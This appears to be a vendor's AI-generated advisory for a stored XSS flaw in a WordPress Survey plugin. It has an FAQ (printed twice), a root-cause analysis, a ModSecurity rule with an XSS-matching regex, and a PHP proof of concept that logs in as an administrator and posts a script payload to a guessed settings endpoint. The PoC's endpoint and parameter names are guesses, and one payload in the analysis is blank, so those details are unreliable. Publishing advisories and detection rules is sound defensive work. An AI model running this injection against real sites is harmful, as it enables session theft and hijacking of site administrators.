What is CVE-2026-1247?

CVE-2026-1247 is a stored Cross-Site Scripting (XSS) vulnerability in the Survey plugin for WordPress. It allows authenticated users with administrator-level permissions to inject malicious scripts into the plugin’s settings, which can then execute when other users access the affected pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s admin settings. An attacker can submit a malicious payload that gets stored in the database, executing whenever an administrator or other privileged user views the settings page.

Who is affected by this vulnerability?

All WordPress installations using the Survey plugin version 1.1 or earlier are affected, particularly those with multi-site configurations or where the ‘unfiltered_html’ capability is disabled. Administrators are at risk as they can be targeted for script injection.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Survey plugin installed. If it is version 1.1 or earlier, and you have multi-site enabled or ‘unfiltered_html’ disabled, your site is at risk. Review the plugin settings for any unexpected scripts.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-1247 is 4.4, categorized as medium severity. This indicates a moderate risk level, meaning while the vulnerability requires high privileges to exploit, it can still have significant consequences if successfully executed.

How can I mitigate or fix this vulnerability?

To mitigate this vulnerability, update the Survey plugin to the latest version that addresses the issue. Additionally, ensure that all user inputs are sanitized using WordPress functions like ‘sanitize_text_field’ and that outputs are escaped with ‘esc_html’.

What are the potential risks of exploitation?

If exploited, an attacker could execute arbitrary scripts in the context of the victim’s browser, potentially stealing session cookies or performing actions on behalf of the victim. This could lead to further compromises, especially if the victim has high-level privileges.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker with administrator credentials can exploit the vulnerability by submitting a malicious payload through the plugin’s settings form. It simulates the steps an attacker would take to inject and execute a script.

Is this vulnerability specific to certain WordPress configurations?

Yes, this vulnerability primarily affects multi-site installations and those where the ‘unfiltered_html’ capability is disabled. These conditions allow the XSS attack to be effective, as it relies on the ability to store and execute scripts.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Survey plugin until a patch is available. Additionally, review user permissions to limit access to the plugin settings, reducing the risk of exploitation.

How can I stay informed about vulnerabilities like this?

To stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) for updates on vulnerabilities affecting WordPress plugins.

What is stored XSS and how does it differ from other types?

Stored XSS occurs when malicious scripts are stored on the server (e.g., in a database) and executed when users access the affected page. This differs from reflected XSS, where the script is executed immediately from a user’s request without being stored.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 23, 2026

CVE-2026-1247: Survey <= 1.1 – Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings (survey)

CVE ID CVE-2026-1247

Plugin survey

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 1.1

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1247 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw within the Survey plugin’s admin settings. The issue affects all versions up to and including 1.1. It allows attackers with administrator-level permissions to inject arbitrary JavaScript, which executes for other users viewing the affected administrative pages. The CVSS score of 4.4 reflects a moderate impact, tempered by the high privilege requirement and the conditional nature of the attack, which only works on multisite installations or sites where the `unfiltered_html` capability is disabled.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping, as indicated by CWE-79. The vulnerability description confirms a lack of proper neutralization for user input within the plugin’s admin settings. Without a code diff, this conclusion is based on the CWE classification and the standard WordPress security model. The plugin likely fails to use functions like `sanitize_text_field` on input or `esc_html` on output when rendering saved settings values in the WordPress admin area.

Exploitation requires an attacker to have administrator access. The attacker would navigate to the plugin’s settings page, typically found at `/wp-admin/options-general.php?page=survey` or a similar admin menu location. They would then submit a malicious payload within a vulnerable settings field. A realistic payload could be ``. This script would be stored in the WordPress database. It executes whenever an administrator or other privileged user loads the settings page that displays the tainted option value.

Remediation requires implementing proper security hardening in two stages. First, all user input must be sanitized before storage using WordPress core functions like `sanitize_text_field` or `sanitize_textarea_field`. Second, any output of these stored values must be escaped appropriately for the HTML context using functions like `esc_html` or `esc_attr`. A patch would involve wrapping the retrieval and display of the vulnerable option with the correct escaping function.

The impact of successful exploitation is client-side code execution within the context of a victim’s browser session. An attacker could steal session cookies, perform actions on behalf of the victim administrator, or deface the WordPress admin panel. This could lead to a full site compromise if the victim has high-level privileges. The scope is changed (S:C in the CVSS vector) because the injected script executes in the browser of any user who views the compromised admin page, potentially affecting multiple users from a single injection point.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-1247 (metadata-based)
# This rule targets the presumed admin settings update endpoint for the Survey plugin.
# It blocks POST requests containing common XSS payloads in the 'survey_settings' parameter
# when sent to the WordPress admin-post.php handler with the specific plugin action.
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" 
  "id:20261247,phase:2,deny,status:403,chain,msg:'CVE-2026-1247: Survey Plugin Stored XSS via Admin Settings',severity:'CRITICAL',tag:'CVE-2026-1247',tag:'WordPress',tag:'Plugin-Survey',tag:'attack-xss'"
  SecRule ARGS_POST:action "@streq survey_save_settings" "chain"
    SecRule ARGS_POST:survey_settings "@rx (?i)<script[^>]*>|<img[^>]+onerror=|onloads*=|javascript:" 
      "setvar:'tx.cve_2026_1247_blocked=1',t:none,t:urlDecodeUni,t:htmlEntityDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1247 - Survey <= 1.1 - Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings
<?php
/*
 * This PoC simulates an administrator exploiting the stored XSS in the Survey plugin settings.
 * Assumptions:
 * 1. The vulnerable endpoint is the standard WordPress admin form for plugin settings.
 * 2. The form uses a POST request and includes a WordPress nonce for security.
 * 3. The exact parameter name for the vulnerable setting is unknown; we assume 'survey_settings'.
 * 4. The attacker already possesses administrator credentials.
 */

$target_url = 'https://example.com/wp-login.php';
$admin_user = 'attacker';
$admin_pass = 'password';
$payload = '<script>alert("Atomic Edge XSS Test");</script>';

// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Authenticate as administrator
$login_data = array(
    'log' => $admin_user,
    'pwd' => $admin_pass,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Step 2: Navigate to the plugin's settings page to extract the nonce.
// The exact settings page URL is inferred from common WordPress patterns.
$settings_page_url = 'https://example.com/wp-admin/options-general.php?page=survey';
curl_setopt($ch, CURLOPT_URL, $settings_page_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract the nonce from the page (this is a simplified example; a real exploit would parse the HTML).
// For this PoC, we assume a nonce named '_wpnonce' in a field with name 'survey_settings_nonce'.
preg_match('/name="survey_settings_nonce" value="([a-f0-9]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

if (empty($nonce)) {
    die("Could not extract security nonce. The page structure may differ.");
}

// Step 3: Submit the malicious payload to the settings save handler.
// The save action is likely triggered via admin-post.php or admin-ajax.php.
// We assume a POST to admin-post.php with an action of 'survey_save_settings'.
$exploit_url = 'https://example.com/wp-admin/admin-post.php';
$exploit_data = array(
    'action' => 'survey_save_settings',
    'survey_settings_nonce' => $nonce,
    'survey_settings' => $payload, // The vulnerable parameter
    'submit' => 'Save Changes'
);

curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$response = curl_exec($ch);

if (strpos($response, 'Settings saved') !== false || curl_getinfo($ch, CURLINFO_HTTP_CODE) == 302) {
    echo "[+] Payload likely injected. Visit the plugin settings page to trigger the XSS.n";
} else {
    echo "[-] Exploit attempt may have failed. Check assumptions about endpoint and parameters.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-1247?
Overview of the vulnerability
CVE-2026-1247 is a stored Cross-Site Scripting (XSS) vulnerability in the Survey plugin for WordPress. It allows authenticated users with administrator-level permissions to inject malicious scripts into the plugin’s settings, which can then execute when other users access the affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s admin settings. An attacker can submit a malicious payload that gets stored in the database, executing whenever an administrator or other privileged user views the settings page.
Who is affected by this vulnerability?
Identifying vulnerable installations
All WordPress installations using the Survey plugin version 1.1 or earlier are affected, particularly those with multi-site configurations or where the ‘unfiltered_html’ capability is disabled. Administrators are at risk as they can be targeted for script injection.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, verify the version of the Survey plugin installed. If it is version 1.1 or earlier, and you have multi-site enabled or ‘unfiltered_html’ disabled, your site is at risk. Review the plugin settings for any unexpected scripts.
What is the CVSS score and what does it mean?
Understanding the severity rating
The CVSS score for CVE-2026-1247 is 4.4, categorized as medium severity. This indicates a moderate risk level, meaning while the vulnerability requires high privileges to exploit, it can still have significant consequences if successfully executed.
How can I mitigate or fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Survey plugin to the latest version that addresses the issue. Additionally, ensure that all user inputs are sanitized using WordPress functions like ‘sanitize_text_field’ and that outputs are escaped with ‘esc_html’.
What are the potential risks of exploitation?
Consequences of a successful attack
If exploited, an attacker could execute arbitrary scripts in the context of the victim’s browser, potentially stealing session cookies or performing actions on behalf of the victim. This could lead to further compromises, especially if the victim has high-level privileges.
What does the proof of concept demonstrate?
Understanding the exploit
The proof of concept illustrates how an attacker with administrator credentials can exploit the vulnerability by submitting a malicious payload through the plugin’s settings form. It simulates the steps an attacker would take to inject and execute a script.
Is this vulnerability specific to certain WordPress configurations?
Conditions for vulnerability
Yes, this vulnerability primarily affects multi-site installations and those where the ‘unfiltered_html’ capability is disabled. These conditions allow the XSS attack to be effective, as it relies on the ability to store and execute scripts.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updates are not possible, consider disabling the Survey plugin until a patch is available. Additionally, review user permissions to limit access to the plugin settings, reducing the risk of exploitation.
How can I stay informed about vulnerabilities like this?
Keeping up with security updates
To stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) for updates on vulnerabilities affecting WordPress plugins.
What is stored XSS and how does it differ from other types?
Understanding stored XSS
Stored XSS occurs when malicious scripts are stored on the server (e.g., in a database) and executed when users access the affected page. This differs from reflected XSS, where the script is executed immediately from a user’s request without being stored.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations